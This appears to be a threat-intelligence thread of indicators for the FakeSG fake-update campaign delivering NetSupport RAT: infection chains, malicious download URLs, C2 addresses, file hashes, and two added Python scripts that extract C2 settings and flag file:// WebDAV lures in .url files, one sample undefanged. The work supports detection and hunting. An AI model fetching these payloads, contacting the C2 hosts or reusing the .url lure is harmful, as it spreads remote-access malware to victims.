Today's #FakeSG

5.181.159[.]48/Downloads/freorra.zip
johnmmartin[.]com/wp-content/uploads/2024/t/ForgotME.zip
johnmmartin[.]com/wp-content/uploads/2024/t/digitaks.exe

1cdbdf9476b04724e12564394094ffa0f74e5345b2fd4d26a78749c408d34f8e freorra.zip
ab6492900c66882416208e9554d85504ad7f7fe6e9674945887bc6ac47ebfdbd freorra.hta
3b289328b73d86fba97c7f533303be66d17576366c9f7ab462b16c6cb085e490 ForgotME.zip
49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3 digitaks.exe

NetSupport
GatewayAddress 5.181.159[.]27:443
serial_no NSM165348

https://tria.ge/240125-q8tdtahgdm/behavioral1
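
The GatewayAddress and serial_no lines above come from the NetSupport client32.ini that the dropped archive carries. The script below is an added example (not code from the thread or from NetSupport) that pulls those fields out of a client32.ini and defangs them in the thread's own style. The sample INI is constructed; only the GatewayAddress, Port and serial_no values are taken from the post, and the section that serial_no sits in is an assumption, which is why the parser searches every section instead of hard-coding one.

```python
"""Extract NetSupport RAT C2 indicators from a client32.ini.

Added example, not part of the original thread. The sample below is
constructed; only GatewayAddress/Port/serial_no values come from the post,
and the placement of serial_no under [Client] is an assumption.
"""
import configparser

# Constructed client32.ini fragment (not a real dropped file).
SAMPLE_CLIENT32_INI = """\
[Client]
_present=1
AlwaysOnTop=0
DisableChat=1
SysTray=0
silent=1
serial_no=NSM165348
[HTTP]
CMPI=60
GatewayAddress=5.181.159.27
Port=443
SecondaryGateway=
SecondaryPort=443
[General]
BeepUsingSpeaker=0
"""

# (host key, port key) pairs as they appear in the [HTTP] section.
GATEWAY_PAIRS = (("gatewayaddress", "port"), ("secondarygateway", "secondaryport"))


def extract_netsupport_c2(ini_text):
    """Return {'gateways': ['host:port', ...], 'serial_no': str | None}.

    Keys are matched case-insensitively across all sections, since the
    section a key lives in is not something to rely on for malware drops.
    """
    cp = configparser.RawConfigParser(strict=False)  # tolerate duplicate keys
    cp.optionxform = str                             # keep original key case
    cp.read_string(ini_text)
    flat = {}
    for section in cp.sections():
        for key, value in cp.items(section):
            flat[key.lower()] = value.strip()

    gateways = []
    for host_key, port_key in GATEWAY_PAIRS:
        host = flat.get(host_key, "")
        if host:                                     # skip empty SecondaryGateway=
            gateways.append(f"{host}:{flat.get(port_key, '443')}")
    return {"gateways": gateways, "serial_no": flat.get("serial_no")}


def defang(hostport):
    """Defang 'host:port' or 'host' the way the thread does: 5.181.159[.]27:443."""
    host, _, port = hostport.rpartition(":")
    if not host:                                     # no port present
        host, port = port, ""
    head, _, tail = host.rpartition(".")
    defanged = f"{head}[.]{tail}" if head else host
    return f"{defanged}:{port}" if port else defanged


def hunt_indicators(ini_text):
    """Defanged, sorted C2 indicators ready to paste into a hunt or a post."""
    return sorted(defang(g) for g in extract_netsupport_c2(ini_text)["gateways"])


if __name__ == "__main__":
    result = extract_netsupport_c2(SAMPLE_CLIENT32_INI)
    print("serial_no:", result["serial_no"])
    for ioc in hunt_indicators(SAMPLE_CLIENT32_INI):
        print("GatewayAddress", ioc)
```

Run it against the client32.ini unpacked from any of the archives above; the serial_no is a useful pivot because the same licence key tends to recur across a campaign, as the three NSM165348 posts in this thread show.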

Some recent activity for #FakeSG. Timestamp on updmgpower.zip is Wed, 24 Jan 2024 11:02:27 GMT, so just a few hours old.

5.181.159[.]48/Downloads/updmgpower.zip
-->
vass[.]us/wp-content/uploads/2024/01/FaultDamage.zip

NetSupport
GatewayAddress 5[.]181.159.27:443
serial_no NSM165348

New #FakeSG

5[.]181.159.48/Downloads/updmgpower[.]zip
-->
vass[.]us/wp-content/uploads/2024/01/FaultDamage.zip

0e465179f23f38136ff272da903c53f5d748384294c196d86cd920650ef536f1 updmgpower.zip
336fa8e1a946463a4b0adc0641116922fb99652796095d55c0bf51fb8bbbcc35 FaultDamage.zip

NetSupport
GatewayAddress 5[.]181.159.27:443
serial_no NSM165348

#RogueRaticate / #FakeSG delivering NetSupport RAT via Keitaro on kokokakalala[.]com:

hxxps[://]fastactionmedicalbilling[.]com/wp-content/uploads/dra/online(brswr_packageupd)0x1dscD[.]url (02f715934404288c08522ded41e5555dc4c931373e4f6b882b562a58ebc77586) ->
file[://]5[.]252[.]177[.]15@80/Downloads/packENGus-brswr[.]hta (912612f572df9256ef84ba30c9a5cd03befa4fedd48817e0d85de7ca30f2b75b)

NetSupport C2:
91.92.245[.]83:443
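
The .url in this chain points at file://5.252.177.15@80/..., which Windows treats as a WebDAV fetch of the .hta from that host on port 80 rather than a local file. The script below is an added example (not code from the thread) that parses a Windows InternetShortcut file and flags exactly that pattern: a file:// target with a remote host, the host@port WebDAV syntax, and a script-type payload extension. The .url text is constructed to mirror the post's artifact; the IconFile and IconIndex lines are assumed typical fields, not recovered from the real file.

```python
"""Triage a Windows .url (InternetShortcut) for the file://host@port WebDAV lure.

Added example, not part of the original thread. SAMPLE_URL_FILE is constructed;
its URL= value is the one listed in the post (defanging removed), the icon lines
are assumed.
"""
import configparser
import posixpath
from urllib.parse import urlsplit

# Constructed .url content (not the real file's bytes).
SAMPLE_URL_FILE = """\
[InternetShortcut]
URL=file://5.252.177.15@80/Downloads/packENGus-brswr.hta
IconFile=C:\\Windows\\System32\\SHELL32.dll
IconIndex=3
"""

# Extensions that execute on double-click instead of opening as documents.
SCRIPT_EXTS = {".hta", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".lnk",
               ".exe", ".scr", ".bat", ".cmd", ".ps1", ".msi"}


def shortcut_target(text):
    """Return the URL= value from the [InternetShortcut] section, or None."""
    cp = configparser.RawConfigParser(strict=False)
    cp.optionxform = str                        # keep original key case
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            for key, value in cp.items(section):
                if key.lower() == "url":
                    return value.strip()
    return None


def split_webdav_netloc(netloc):
    """Split a file:// authority into (host, port, ssl).

    Windows reads host@port as 'WebDAV to host on that port' and host@SSL@port
    as HTTPS; urlsplit() would misread host@port as userinfo@hostname.
    """
    if "@" not in netloc:
        return netloc, None, False
    left, _, port = netloc.rpartition("@")
    ssl = left.upper().endswith("@SSL")
    host = left[:-4] if ssl else left
    return host, port, ssl


def triage_shortcut(text):
    """Return the target plus a list of findings explaining why it is suspicious."""
    url = shortcut_target(text)
    if not url:
        return {"url": None, "host": None, "port": None, "findings": ["no URL= entry"]}
    parts = urlsplit(url)
    host, port, ssl = split_webdav_netloc(parts.netloc)
    findings = []
    if parts.scheme.lower() == "file" and host:
        findings.append("file:// with remote host (UNC/WebDAV fetch, not a local file)")
    if port is not None:
        findings.append(f"host@port WebDAV syntax ({'HTTPS' if ssl else 'HTTP'} on {port})")
    ext = posixpath.splitext(parts.path)[1].lower()
    if ext in SCRIPT_EXTS:
        findings.append(f"target is an executable script type ({ext})")
    return {"url": url, "host": host, "port": port, "findings": findings}


if __name__ == "__main__":
    report = triage_shortcut(SAMPLE_URL_FILE)
    print(report["url"])
    for finding in report["findings"]:
        print(" -", finding)
```

A benign shortcut such as URL=https://example.com/index.html produces no findings; a hit on the first two findings together is a strong signal on its own, since legitimate shortcuts rarely point at a remote WebDAV share, and the WebClient service traffic to the flagged host on that port is what to look for in proxy or firewall logs.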

New #FakeSG #RogueRaticate keitaro host and cookie:

jagernaut[.]com
188.208.196[.]186

cookie: 03fe2

#FakeSG seems a bit quiet lately, so digging around I stumbled into yet another site with multiple fake updates. At this site the #ParrotTDS is still operational and sent the potential user to #SocGholish.

Does make you wonder if it's all the same actor just trying out very different approaches? They got a new employee who was tasked with trying something different.

¯\_(ツ)_/¯

Updated #FakeSG infection chain

Compromised site
-->
googlestates[.]com/pTskQ6 (Keitaro)
-->
www.chrisrichardsauthor[.]com/wp-content/uploads/2017/10/upd-(cohort-M117ES).rar
-->
hXXp://79[.]110.48.214/Downloads/ClientStart[.]hta
-->
www.chrisrichardsauthor[.]com/wp-content/uploads/2017/09/ens-1594(msx).zip
-->
94[.]158.245.150:443 (NetSupport)

6a19eda1180cb66e013db974dda32968bd29d47257095bca99c01c50f6a0b868 upd-(cohort-M117ES).rar
51ab827a541737c3612f61ec35e7c824a8f6df3a1b800dd0748c3f5a9901bc98 ClientStart.hta
2c2c252d5fae28b23d1ee760ad6d9499573188c32ceb947df0da1a3600841ee2 ens-1594(msx).zip

Updated #FakeSG infection chain

Compromised site
-->
googlestates[.]com/pTskQ6 (Keitaro)
-->
moodi-wood[.]com/wp-content/uploads/sass/client(upd-v105.214.51).rar
-->
moodi-wood[.]com/wp-content/uploads/sass/KreosInc.zip
-->
94[.]158.245.150:443 (NetSupport)

c4923cd0534a46278c8467c3e6cb139ae44fb8a0d3b3e567bf80dad94ad605e7 client(upd-v105.214.51).rar
deef9b58009eedec781267660e50de1ae404656d0d4b556feead857cd94b8156 Install Updater (silent).hta
a1f48e0f4f93cb57e1af6fbab198711aaee02657316ae4d2a141ae95e20add00 KreosInc.zip

Updated #FakeSG infection chain

Compromised site
-->
googlestates[.]com/pTskQ6 (Keitaro)
-->
moodi-wood[.]com/wp-content/uploads/version(stable-en).url
-->
hXXp://79[.]110.48.214/Downloads/Client-Upd(download)XXXXXXXXXX[.]hta
-->
moodi-wood[.]com/wp-content/uploads/astra/DancingParty.zip
-->
94[.]158.245.150:443 (NetSupport)

b41d1123c42f33e2c242abbe16b7d45038b93c05d88abcd4b414460f02b00458 version(stable-en).url
76d18608efb2b29e6cd54fe6b4b984e78e7d3295bf392f853a2fb789fc11a59d Client-Upd(download)XXXXXXXXXX.hta
ccce27aa3f199c43fa83a1cd23336679e9d2a3d3b0f832486e850bd97a280e75 DancingParty.zip

Updated #FakeSG infection chain

Compromised site
-->
googlestates[.]com/pTskQ6 (Keitaro)
-->
moodi-wood[.]com/wp-content/uploads/elementor/newV(105-3-2123).zip
-->
moodi-wood[.]com/wp-content/uploads/astra/DancingParty.zip
-->
94[.]158.245.150:443 (NetSupport)

e3b1eefac82008d35e60b8f75341a8f272c0becb6fefd69d2119571a41bb0c37 newV(105-3-2123).zip
4a9f42167f399abfbb42a5ee4d52922eb3f7f1ce88d23824f01d13e50609b8b9 Start Updater (silent).hta
d38c05a7306ce8dd6439608a00b8515dfc1873e6e8b00d247dd23fe60fa7ed03 DancingParty.zip